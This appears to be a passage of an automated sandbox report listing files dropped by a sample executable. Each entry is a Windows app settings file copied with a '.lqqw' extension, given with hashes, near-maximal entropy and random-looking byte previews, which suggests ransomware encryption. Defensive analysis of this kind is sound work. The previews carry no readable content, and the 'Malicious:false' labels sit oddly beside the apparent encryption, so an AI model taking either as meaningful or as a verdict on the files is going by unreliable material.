                                                                                                                                                                                                    MD5:E30AAC717C91D716F1FDF1AA9CABD325
                                                                                                                                                                                                    SHA1:22F433A980ED99E8D2863CDC34E859020DD97E9A
                                                                                                                                                                                                    SHA-256:2266ED3CDAD77279F04F107917A9EFBD8E024945A1D084DB726AF3B9978EAD0E
                                                                                                                                                                                                    SHA-512:D08742E3B87D01B0402B1085788CA06C0A736E50576B64A169760D9BE0C0D5A0933A0B0C120DCB99CFF4979F4220BD6C0FF23514C51EEF56E1010651BBEA815B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 8w.P...9*y..x..0..n..n.#.[}.....;...fS....G{Ym...T....2N].......(9d<.aF.W.vJ@........Vw.;Zb......T..^..DT.ML..I.....n-&.G...W;....C.HC..+k..2......<.mp..wX.~.f.t,y.....,f.x+.8..ib...8..%..g..K.w.;.Q........{.....Ef.U~)w........9{.]."..G....1.;.m..Y..|**..U.y+.-..'..}:.....tS..z.V...L.VPn..K..D......7..p.#.e...o"...'E.E. Z.X.!.f..k.*$(.%#..5#..........L.j."........[^l.H...dg..V......d#.P.....r.c%..Y..Ige.....A..T.Ke.0.mW.u.....W..D`b...^.....:..VE$}7?*yJ$-/;...N..?\..>@...%....4.:.S.R.Ug)..O]K.F....>.}Q..5)c..].....G]Z...._,.j......X.e..5.DR.:..8._.K..!8@.,.....^Z.B"..J8w...../........0+..P.-...../eEBY..+o.%:..a..X...eeI.....~0...RJ}C.T.."%.^Q[.X(!f.gL/Os.\..y.....z.."W..v(d.........l$.....@)W.....#......zy.a.bC..v...v'..y.....B.`._f......$....?Q..]U.l.s.2m.c.................#.....|rx.#u..Y...h......X.~......X$:E...4E..E..........Q..t....(.2P..S....W.....vW.p..A......_..f.2zE.P...5..7.rp..&e...Q......y..[...bl.Qm........E+M.}GM..$%.?i.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976113578385722
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:njfUZNMJGXR8FSOTcI9rl0twV4Zx4X4A8W81GUPc+pVkFPDKH:njpjFhk8e4oA8W81GP+EJDKH
                                                                                                                                                                                                    MD5:8594AFAAEC855DAE0A6FD0DD2F6B873C
                                                                                                                                                                                                    SHA1:9C39364FB529146C4E281A20D990A174BE8CAF14
                                                                                                                                                                                                    SHA-256:A1AC680848F29DD670FBE444F4AB13BC130CEF443A27A97452D483D0E0EECBCF
                                                                                                                                                                                                    SHA-512:93952BF55293A94B4F575B84E5B24B8E5416C2336172818BFC18D9E5A47115D42BB2A3EB256FFB3705E60318A1DBA81A4D89BB97702C7DAA85FEDAE03A9C354C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..t...p.EP....~.....E..hW\.1.-G....l...+.IV+~.S.........#h.0Ag._f!..B..Z.!...xi....}$NF.N..E.9K...}.}7..U-.~..<.(]..x.}pN.o.....Guq......Q.qa.7}rb.jQ.$..p.o..#......4...5.#..].*...)..]..b[.=..x.....4U.......;.I!x....#/.YI)..e.!...m.c=..s...F.Qo..1.5..:.J...D..l....5.{.OoG..|.q.98j...%...g..k~3....+..q../m.7..{R....m..v..........K....b.AGi....B...-.~.4.7m!.h..pD.z...Q...G&HR1.-C.6.....5@..GN%..J>..9.j..?W..4]*?...]W#.$.R....G.j.r...5..o7.pt.]..J.>K...>....3...0...M..d.....i.Db.._......Sl.[.C....g.Yt1.Crc.y.a...w..L.y..].%...q..h.W~v..R..*...-..R.....] ...."..K7..y.M.&g.E....j.~..%.....s....W....7.(.Z@..I..,=...}N.@.....=......E........O......N.U.~:.:'(....Z....{iB..I)......p.3-;wgs^!...b..$@..i.J7w.Y.&7..Qh..."a.....q,.....V.......X4...~..G.tN.e.{...^z....'.~......L.&=9v.K?..+.x.W..v....t......`.^.....}u. .P..7.>..l....>C.|......F..?S.mp.=...4...E..{gFu..`B......-.....H.>o.;hzO..]...h{.n..[{y.r.|....J.S.rA..X...)U...).....]D.\.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9795885100628885
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:vU+T1Mm1eFSD5YgxSYZ4w9mpTKdnPj7t6gVyK7rL9osQYnX:s+Tf4FSDmgxS+V+KBggVy8rL9FX
                                                                                                                                                                                                    MD5:0EE36FD3320D7C624165B226ACC92D47
                                                                                                                                                                                                    SHA1:024F42206CBF43C8233ADB50AF03A5853D62D5CC
                                                                                                                                                                                                    SHA-256:A2CADC1538AA2E26AE151F3220B60EC3F94119237C26B9D772D58ACAA4DC0314
                                                                                                                                                                                                    SHA-512:08DA3D100F01EC13333D1A388180CA102A86DB201B1E54724B55CFFF657663A6516A99A6710C95DDCE2EA12A738C3019A01F3C17CE9F1623E9545698E6665F9F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: sB5.l..R...y.....["..3....5.Q.&[;.....p....,..:....e.>....Xr....t.n...1*M;.....9..7c..m.B...l.hw..!..k.8..{..IC..}.Q...(..S.d/2#.h.$i....D.z..W^......V..-.j.{.m.j....b.?......E.9..#..v....>^.h.".l.[RL....cF..q..F..\J......)..+......y.dm..r.....T...f}..........m....C....5...c..Li..Ut.'...c..2.......$..`.R.9..\.@..Al.rx.28KR.+.......D5.......4.6.._...C....'{k.|..I.sC%.,...r..... [.L.X/...u.y..x=K.......Y.H.[]/#a...|3!..{<>..L....J..!.4s..(..p............./..Tl..|v.Q.f.t.e...`.....Z`....UfQ.H})...d...y....A..h.1H(...sR.=....?....$.....8.>h...#..S...........A..d....e.>...}s....M]..\..?.3a..!........9..ch..^..;a..z..Mf..T......&..... 6?I.d...1.\..AW.M.]j.N\m.#....].....z{:@....)..S.....+b-....B...8j.q"..f.x.8...|..p..$..k..h..f.)...lx....zo.0....lz.gMM....^.....a. .../. H.T.nMs....-*...M..i1;..K.w...1.5N...W........0.....^=.GD.....d.&.._....f...W...@....Z....Y..]_+.G..ecA.....*...5b....C@......Ii..kp.e.Gf.K.1..F\m.u.........P
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.981101986490041
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Jj5XCbh0Fh1q+t6fjqg2K/nZ630vZEe0bREpVIdHgpojL:V5XCt0nwiMjqg2K/Z63IobwS3L
                                                                                                                                                                                                    MD5:91F300F09A3809CED74AE0BD3F5529A6
                                                                                                                                                                                                    SHA1:4AA0176C2D75D5F33AA5541B9D0D9500BF2FC754
                                                                                                                                                                                                    SHA-256:09C6F9A860BDC17A9958E63B6E7E8F4DFDB752CC90440291A10C35F1EEB117ED
                                                                                                                                                                                                    SHA-512:7AF46E80B09EE793C31D15205AEF924E860E2EFF65B5EDA4AA39A031C64682E801E4DEEDA8E347D7ABB6BD4D354FB11D3056FC25DB9742C4DA2969DDEFB4DABE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .UB...26........Pc[.F......g^..C.a.b...=.Y..zCu.^bxi..4..%.z.>S..8....8..*.3>.3.w...`C%[.rp.&.}......^I..A..........n..jKZ...Br!P).-.MS...,*.Yj&......+Y.....2...6......w....T.s..b.0.....".k..,.....b...j.<A.....[...&.......-)}^ N.........5..d....Fv.Cv@...rI...?.v1.iD..2.i..~.&.(.1.g.;......oJ.J|.T%.X.\..1V...>]..........7O5.K.y._...|t.....6...i......{.i$......."=.k.I}..u~.}..-.$c.H..P...P...6Gk.h..F.P#...S.........^.C.PN....>.....<`i...yK...Y.S..{..!u..0...#=.\.B..EB.x.qA.....{.I........l.i..g(...(.[.S{+1.....|.J..:.X..6g........k ..kjp..........^.!....[.2pv.........e.....5....o!.....@.84.......u....g..>{.L.#yZ...~.u.U..J.Ds.ji.R.y....[y)..<..L$..u.....oD.nh.FR......C...)N..j.8E..z...<..=...J..J..uW..,.)8..?..{....b.SK....\Xp.E.. ..o....2......f.@)ea.M.K.F.U.{.....O.._.@%..{.._..Z.5u.z..5k8Q...~...{......."...Z..oB..[.........i..........|<..,.Jv...]U_.Z..^......p1../f@..g..J.3.OIv.r1.|.(.....D?-..l9VU:.#T..I..c.G....Dk<.1.7.~.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977346754942772
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:wfIIUn6d+Cqc/LRXOMVj5yIKuTPCJP4cEocOO7VWU8Wk1LePGVVIw:w86d0c9Xfn2+P7OOpxcbIw
                                                                                                                                                                                                    MD5:9228E7D078794718D31CA6C950BA77A8
                                                                                                                                                                                                    SHA1:F246059DCFA18BE4216B3403D8A0E69879C6F237
                                                                                                                                                                                                    SHA-256:79D7BE835F9689F10FBF1CBC4EF6583748671D8916E9B8AE5C1DC456E4361334
                                                                                                                                                                                                    SHA-512:CD3E5EE9D0B72C0B25C16763524A9524589F5D3DF06AC19CF982826BFDE489FC04DAD5A24E8284BF092A10AD695E7340CECCF86B0B942F4AA0C284A7F81B5AC3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Xt...6.b^<A.[.t!G.%.%..^.9.zn...@pdq....@4W.....d...)....$8).y..S.m....".b...g...f...M..X.VA.......C.. ..X.....,.Ky......o:.]....1.-..........p.M.cq>D.e...DX..1.HR...[.....5#.0..E...O.w.$N.._.q.73...B....F.?n"K._.c..F......].;..`...[ZkH.U.pp..l..=..m6,....(# ..i...Bw.'..A.)>....S..P..T*.1.....f..v....:3...r...G...&...{J..N%...UdZ.%.... ..w.N......m...1.xY`.Q.I.....|q.....(..}...#.n...sH..'o.....[..h$...r.0..2..C.F...k..fV......Q....:.=...O}.]7...T.....V=.."...gC.S..K.e9.[...&.)c......5.B...<.q.7..q'8P;....ZGi.I.Q:d....H..X]U....suR4s M.......gX..G..v.R]......".{....x^.O.ur.T&.KB.._..}NT...w..T'|..t..j..|....H8.R._~I&..w..e.&.".?t.....IG|d.O..(.o..3{H.jK#>.ht.....AV.0e...../..h.A..~....."..#....0N.0h....o..9.6^.*.`......v...X8. .....#m.?.@....:..Z..kjM.9.%..y.(OO..B..j.....9..<...DbP.h...xiC.$Cw>...$..v._....{...s..&.M.De^mo.7.....s..m.o9.y>dm.....KQ..8.p.>....N.......Tk.o.w.k=.+..o...adm..Kl......FD.....e.......:+.wB.P.X.r
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97822989257035
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:uxNHBqUUk6YA3gQGurSzWYWlKmwYEeaPhBfEoBO9cw:uxNHTiYvArSzWYWlKaEpPhBf69cw
                                                                                                                                                                                                    MD5:81B842F29C8C95A3E2735102CDE5BB60
                                                                                                                                                                                                    SHA1:570E02ACAF130B6AF9B9C9C932F3624D0DB09BD9
                                                                                                                                                                                                    SHA-256:1EA2C262E62A2F8E1FFBC1D69E1A38160DE8E4165539748B0B7C6EF035939213
                                                                                                                                                                                                    SHA-512:68765C63154A4F64C3EF217BC499CB4CBC58A663629BD66E84C1CD15E09D4D64010AE86C79DB772E3A3351C71C4AA96DCF004457CD42C6FE33AB0D9EC29529D9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...%.6...Y..nz.+&X8aS1.\.q.(....c.B.'O2?.)..N......|....'^...2....~2...V.y....Y.."2Cz}@vf./V..N...+...".R+%b.q.&n...3i......].v$.......|.jQh..3.-....T..w....c.jF..Hw..a...[...hH....../k./. V...[>.7.j..j.qBf.~.."b"..}.4.i.q.|v/...#O.d.jT.,#..........4.".q.2.I...,...R........uZ.......<m..N.].....K.s...b.......7#..E$o..D..x.a.....a..#.....G%L.A....kYF.+..!y.Z......./.0Ay.....W%.....Y..qFA.[..M..........#+.|1...Y...+,..R_..v..*ET.T.r..9....}...=0.h.)..#....R1..t..:F.qH...n.]....c..K=...q...:4...eu..o.~...d..h.?Q...b...y.pI. ...(p.\...'wI.-.,)+.i......wed......+......!.T.?...I.#cX.....p=.. .. ....b`..*<.xc..X.ah...].OX...7..\.....w. ...L6...[v.R{....g<.J.B._..Z.......P@X....t-.|U.?g.d.1-..C.5)F.$C...\.....V..kQu..4=...N........u...D.....BK.[.].B..xb,39G..x.l.Kn...^.....?..i.....4{...9.. .=...8.....O.....,{....r.a-@..L....0.$.y.....X.O...)E.....|.lj]=......F.w..'u}z*&3=....M.+.........q...C.g.Yp,.S.{.V.s.L/..u..0..........r}<D.= ..b
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977327273479636
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:ZOf9VJHD11D2BAcbWlX1yQbbuZS01Ua37sJcNhB:yBjWBADp1r0Ka37sqNv
                                                                                                                                                                                                    MD5:7801B699EFFAC6AC20C535B3BFDEE87E
                                                                                                                                                                                                    SHA1:311EE82B7CF7B468FAF688C02F46ACEE502FA42A
                                                                                                                                                                                                    SHA-256:FD46327114CDD96DEC3A33A3D4C9823DD2A1BA334E1ECD74CD357EDE71935C5C
                                                                                                                                                                                                    SHA-512:A3BB8AB125E470810C36D031D23ECA90B2C7BFDCADD928CC7207239911719EA69506DCBE14B57787674982721794C7B0293CEE0AFD3C9B142DEF7AD69FEE5A97
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ........NU..^.........u.....Zz.!....V..o..P[..Q...C(W.7..L....6...!rY...oEv.I..t*$.e9e5...............l..~Z..XPJ......J.eE5.7....%.(.!...2.gTi0..}Y...C.T.?.nL@.d.B&.B..E.G$...Q(..".G.....u...I.X....:H..y.V.q..2.l...6.[O.i../..a.d.+..<..../..|P.R...C.w....H.!.8-.~.I.b..].f...)y...1.....t.-aS_.,...p...j...k[..\)..-.X.....:.......O..>..V;.4..F|C.0.[.5.NYzg.+..-.`e,p.8.2+.d5.~...CT.{b.q.).......z.._.. {.Yd3..@B...|.....%.....].6Z.B...x...D.L...o..^E..T.......[.&m.pB.....P>.E..L&.{y.....s8.<B..R..g...W.u@....'8.IOG.....9....9.(6k/LX.q.._Yf..dP6%....%..2..,....d....^.'{.g....u...c,B..fC...{.C.....o8.7..3a...$.j...._........O..rs.sx..D...K..L.H...............a.\%$..MsJ>..0..`..c(.g..:.....$.w<Q.......=J..N........q.&.1.qVC2.R8.d..^.D.jU..$cA%.\b.z.....]...V..'..)..6...``}T..X,........|.2...s]...o....B.7..e.R...n.FV;....h....'Ap..t.t..1J@8}......b.b@<.C.[..q...@...^...}(...`.......~"v.X6...tI..bk...@h_....BV#..~S.'kzM.y..R..f...uqq..&@8.j.-.Q..._..N.!.lD...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Print3D_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975904439379363
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:LflryShXO4RA22sgrkvzGTHpUBQN7UeGU+JXSOTTM:LNGS5LRA2GQEpyc78NJXSiY
                                                                                                                                                                                                    MD5:87A9EEB31EB7B1A6471EFD6267E6433A
                                                                                                                                                                                                    SHA1:17B5868A4B4F40C720BAD128FE14617DB24D2D9D
                                                                                                                                                                                                    SHA-256:2E11B174DDC4968986F54D3F48D0FB8396002618ACD89370132EF62DF56C6386
                                                                                                                                                                                                    SHA-512:3F236DAEE71E1C905248C04401AE1F77903995C7C5C2378248930E94AFB49F6AEFDAB228AC245C4E6F4089CDB44FBD272165382C3B79770FF3272B14CB509377
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...O,C."...#.=..zj..G.7`t.z..d.|... P...#.8...Q.b(.l.-.<.yc..P[x....r...A7.C.vjp..8.xx\......P.}-`..)..U.C..b{.q\t."8....8EE|...=....{...7...b.0..:..].=.>3.}..Ve..\.T....I.Hh.(..h.b,...c....y..P..I..P.....4..q.i>z.mAD.M.=......*i.;..J....z`..h.4.U.&j..g.....w........K.i[kG4nJ....;.......ki..[.-a..........L.]A.....\........XZ.../Z4 Y7j.s).-..W......q.^L&.#.z.z.p......).,t.(.a..eL............'+..U..I:(.=.c...6j..dQ..,....T......5.p...W.\R...WAP....|\....\..$uE..0{.'.>G_.#......Iw.J..][..J.x..dj..%.....o...$...b.n.*.I..I`*D.'..a#..E.P..s....l}]\.>.+.f.h4.....W.9.u...^r....X...>.1....v..F=s..P..1o[9.~8W..7m.[*^..;2..Q.X..%..s{.6)..(..0U..Gj5p.+D.k...a."...\._.?q2. ....E5..g..5U.g./..5.l~R'...U..*....e..Va`....L.{.....,b.. .0..-.90Z&...0..L..8',c.1..O..`.f.O...fl.Z...f....60..........^.D."..UUOj.t.......G1........r.......6......%...<.i...(...3..c.O..t.k....."#X1...K.T@.fj.).e....Z,..*..(*..*.....g.M..i..J.%..n....p..@.m.y.3.......0]9(.@ bV(.a?.7...u
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.979163299435657
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:XLZrOYFchSMs/ZHwN4Y2DbzmdQgRBThvfBDfIsEGn4j:7ZKyceNwK/3zkLLThvf5fIsEGu
                                                                                                                                                                                                    MD5:2989AD8A885C0D2604B4B53D0F3A76D9
                                                                                                                                                                                                    SHA1:483BCB91798106BC16DBC5C8FBCD32BFBD339AE3
                                                                                                                                                                                                    SHA-256:DFD73236BCA2A5FB0E3FD938D53142241A979E83900955A7FB043D3955A9B3B6
                                                                                                                                                                                                    SHA-512:F021B5ED75363BA751C04177741B24D21DF72A1765E9E30E1B6624A3FD9AD4D33ADF99465B07A6F7EEA6E2B54078D2461681F9E5E06348B9A597C7B298FCDF59
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Hu.d..K....x.!.H.d..7.H.'y..0..(.mY5..(.......`..Z.....}B..R..u>>D7yL...{...].0...A.....y..i[.j..y.k.D..6]GD.] +..........E.......z((.H.M.4.%FB.E.<.]..\Q..$....(..1x...;.....\..<.t...z.x..d...J.H...mo....\.....v...4~.~..|..>..o.5B.~......#TG.~..B.........V&.,.}.. .!...'.:.0.......{stUe."b.t....!#~......XD.O.Tcy......4.Vp{...vh..v1.x.s.e.vlQF..[.........f>-Q(...1....C.......YQ..........c...;.:....1t,.../4sW0"....YV.,.....=.<. Ng:Q..s>.|.T..S..0E.x#.T..`v.b.2n..sY..U.Py...3j.p=....e.....1.g*../..M(...}...<......`.d....hTfC.<k{...S.1...8...X........G....l.).e...)9..c...Oo...F.......]zM5.!.x7.4..ea..-.TCx.......4%ACz.P...Q_*......X.!lUSl.............8....4:_E2G.C.s0f.P.4..1....L..J.Rk..%!.'....L/`..q:...@...o;]P..... ..........0.4.....6..{.1i.v..{%~.......G......t.$h...?..>\../....r@..w..-.....i....]S.B.CA.6..^`......O.....T.....w....XP.....6..../MN...k[G'.......Qn..H...B..Vh.U.d....e|.....f...W....:m.."a..?.V".S..u....x..1......n9.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978143070510358
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:+/8QmvgjVLWH8waP273bT4jaLgoHMiKykvjhWsgm:rrAa1bLsikdv1Dgm
                                                                                                                                                                                                    MD5:CBE0A30214957EF7E5EE84AA63FCEC3C
                                                                                                                                                                                                    SHA1:C12BA316CA796F689EE477857505C135C0653C31
                                                                                                                                                                                                    SHA-256:9841A82298ABFDE8768FB567B126AC110AC2C16D229814A2E4257B7B112F1623
                                                                                                                                                                                                    SHA-512:7B03410DC6B0AE8FE919E9CE99436E00F11839480CD941C6913D6912B85996DBD6E4B93BA5A5BA48D31ABA0B4D96133F444D204D92C089D1E2395B05050CD389
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......wX.o....ou.#.&tp...U.......hL.#. .L..rig[.....Yxp. p../u...Ao..S...........y...*....?...B...gLII....7.......z=n...[.c6.P+...5..?.4$<...L]......(.#..I....=....sV...j3B..B.D...|d.2......-a..;..( ,...!..H.(...O...A.3&..6....?v.u....U...S..|s.c.eO..oXW.>.....[E......M..dz.Sq.$p"..j...%=D..H..&..(....j...r,....Lb....8..,...$..[....4...Zr .....h..<..enf..n..e.'...>.....i3d-.w7....~.(...Z2..O.I.Bh..$"...oA.j...n..7..&.#e.f..I.3........T...m....#f.Y.2..7.).. .{1jR.h.t.....a)."ej.M...4u. .v....{.i.c....jy.,..H......M....@%.....A.2...R1....ZJ....M...Q.-5.O...:.^hcL-LR.../.......(..i..]I4...j....B.......y#.....GZ....W...Kn...+...R.n.Y@].p.0|.,.$-..3Z...!....Y.,..*..n.Y.x.ede*.ZAV..cr...D.EF..kg..,.*....6^....>..D.)-P...#B....W.V.Q...v.l...S#.....|...G.?.rI.F..,:...u......F=sv....,...<...n....&..._...A|...M.....=..rg.G._0WTc..8..e.P@.....f.$.Kg.B&:P...4-#.U.]..Z.u...Q...1..u.q|.i.....R {..Y.-;....2.....w..K....@m..w......S.G.S.Uj.....Z.a..2..O..+).....+&
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978625389674523
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:DtKPNT5y2DGqmfiQJ4kB8tp9BcD+tJ56k40AaTs8s2NPJiDD:Dtqf1pmfGecvB6ygk40AaTs2JiDD
                                                                                                                                                                                                    MD5:2DBBAD65094FF4E3C60DA1C75D702890
                                                                                                                                                                                                    SHA1:42BDC3FEB8D5710A6E7A59D38E7957E7216C56A6
                                                                                                                                                                                                    SHA-256:96C1E5843DF42A823991FEECDF060831C6D3499DC013B3F0FA182780FC4E5819
                                                                                                                                                                                                    SHA-512:D7DBE1E0B32A1E784618003A4504542FC6030BB0C91CA41BBA303328C7C0A71E9DEDA3ADC0D799CABA54B467C13710982E9ABBD03C8CDFF80532FCFE1A0A0FF0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 6FK.....~.8..H......0.#..).@..D6=...e..b.....B..|...aM0. .Tq{..t.&.`..e.....MId.B..nh..W[....M.K...F!...nX.@M..h....=6...%..H<J.J'.Zk.u.S..l...U......uQk4....m........+N.. .!.X..t...wu.U....>#pZkt....T.......!.(\1.H.4..!.Q..C...r.>"..o....Z.gz...].............2..[..._.cJ..Au..W\U..P.h.a.{Fj...f_.4.M}JP..^*..P~.e.\.,@~.@...AFF....o3s...+J.-..=...lk`.....k..!T..=!.$...........*.4...D}/.0.W.......%.....).....4....C....mr...G.`.d.............t.....wH1 ~..M....O.......<C=c.,.|E#F.j;.w8.!5...Q>-K...........e.<9...M...`.0*-.F....s0x7>.yd.F`WM....._.,.sK.W.X&.$}.D.W....g..]JzuFv.-......`...1.j..4......G..'.(.a.Q../...zU{8hLEK..1k*.I...9.i<g3..\.}D...sq...%|.dG.h.^....f....7...m...#p..H...V..d.VF..0.^..Q.$U._qg.%eY.o.U4._...w..-:.L..>..k3.......%yc..T..Z....@55`K.SX.t\__.d.a1...........5*.p.u......awA.f.......9..1.o...3(6W..K..~.n.T......#..+z.<.(Mk.Z.....(M+$ .w.w.."..2..."_...'..-..k....3..7.X..9.1V.....j.7..U.EzD.O....J...Vep8...}....$...'1.hp
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980124449155622
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:gUVwB1ulBo07NL4N2ZIB4FoUBOZB0BmhTv3vSp2BFW9l1zIiMuYFqL9:gU6julBo09g4v0a+/4KMfYoZ
                                                                                                                                                                                                    MD5:AAC338152A93AEFEDD196BA3C1838255
                                                                                                                                                                                                    SHA1:742F3A97885BE89461B274FC62E95C8859EA45B7
                                                                                                                                                                                                    SHA-256:2F2ADAB82D7B3757E19679668F3353FEF52927D8FE1B9C5B10787162D50D9664
                                                                                                                                                                                                    SHA-512:6CD9496E199AE2A6BBC79D3D388EAFC0CD1744B9660361D7549C4B9E81573EDE7C29F061D316F21DA54985838D63747E0DC311EB2BC26607AD506CE5879DAD8C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: -o..7}..V}.+...ET.iq0IX.l.%.n.....h}MP s.sL...|..}.;...U....,$T.....d.Y.G.2.e:.y..^[.;.f2~.F....'X)Z...$hDg.....[%V......./5...g3.._w...w..x...".Y.)....q[..u..@XC.mk.[.h.o.P.&..[#..%..x..Vw.........%s.....9.Tj..c."x........'d....]...?........Q..@[B....*o..c....._.\.n.Y..u.(8|..^....V...#d.....4....p....H.^...i...2..`A.Z.h...."....k3h..=.8..6......8...y.P%J.....`.u..v.G~.........-......_...Z........R.hn.....`.....P....X...+S..k.J........P..X.........qp[....a.PV..r.z....x.%.V.....|..3._p..7....Y1....&.j..(OM.P..4Z.!N."o.i....M...Bt.i...n.f...w.}..,U..=@.u..L`..Yu......n%.g.I8.u.....d...r.d....C0.8....W..P.....6....e7...o'.~.|..1.F....@x]....+...R.`.......0.$"9....U....q.E.....y{......{F......k....U...+..*?C....Z.g.C..R?...Lc.dg....}^..67.;m.....> P. ..H...S...gg../....@..$.........1|r...%......L.}.C..>6.2G.6)3...>.i.v....$.=1.. .}@.!..I...;.t.<I.D.jnCF..6..-.....(CG....n.t......T....M.Q...Pb.D..qM|..T"4...G...".9#.........t...}..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
